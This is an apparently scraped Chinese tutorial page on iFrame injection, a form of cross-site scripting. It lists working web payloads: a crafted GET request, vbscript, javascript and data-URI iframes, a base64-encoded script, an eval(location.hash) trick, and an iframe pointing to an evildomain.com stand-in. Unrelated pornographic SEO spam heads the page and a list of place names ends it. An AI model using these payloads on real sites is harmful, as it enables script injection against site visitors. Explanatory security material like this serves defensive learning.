亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何解析iFrame注入時的利用

發布時間:2021-12-10 15:32:41 來源:億速云 閱讀:159 作者:柒染 欄目:大數據

本篇文章為大家展示了如何解析iFrame注入時的利用,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

iFrame注入是一種非常常見的跨站腳本攻擊。它包括已插入到網頁或文章內容的一個或多個iframe代碼,或一般下載一個可執行程序或進行其他動作使網站訪客的電腦妥協。在最好的情況下,谷歌可能會標注該網站“惡意”。最糟糕的情況是,站點所有者和訪問者最終使用了受惡意軟件感染的計算機。

iFrame注入發生在當一個脆弱的網頁上的iFrame通過一個用戶可控輸入顯示另一個網頁。

GET/search.jsp?query=%3Ciframe%20src=%22https://google.com/?%22%3E%3C/iframe%3E HTTP/1.1

如何解析iFrame注入時的利用

不同瀏覽器使用不同payload:

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

如何解析iFrame注入時的利用

多種利用方式如下:

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  <iframe src="javascript:alert(1)"></iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

接受用戶提供的數據作為iframe源URL可能會導致在Visualforce頁面中加載惡意內容。

發生iFrame欺騙漏洞在以下情況:

1、數據通過不可信的源進入web應用程序。

2、數據作為iframe URL使用,而不進行驗證。

通過這種方式,如果攻擊者向受害者提供設置為惡意網站的iframesrc參數,則該框架將與惡意網站的內容一起呈現。

<iframe src="http://evildomain.com/">

上述內容就是如何解析iFrame注入時的利用,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

长沙市| 荣昌县| 河东区| 思茅市| 独山县| 广平县| 吉首市| 萨迦县| 营山县| 余姚市| 泾阳县| 陵水| 南昌市| 渝北区| 鲜城| 闵行区| 南召县| 登封市| 孟州市| 仁化县| 获嘉县| 姜堰市| 土默特右旗| 青冈县| 高碑店市| 浙江省| 大港区| 襄城县| 云霄县| 阿荣旗| 武宣县| 肇东市| 浪卡子县| 南雄市| 新乡县| 台南县| 会同县| 昭苏县| 新郑市| 西乡县| 辽阳市|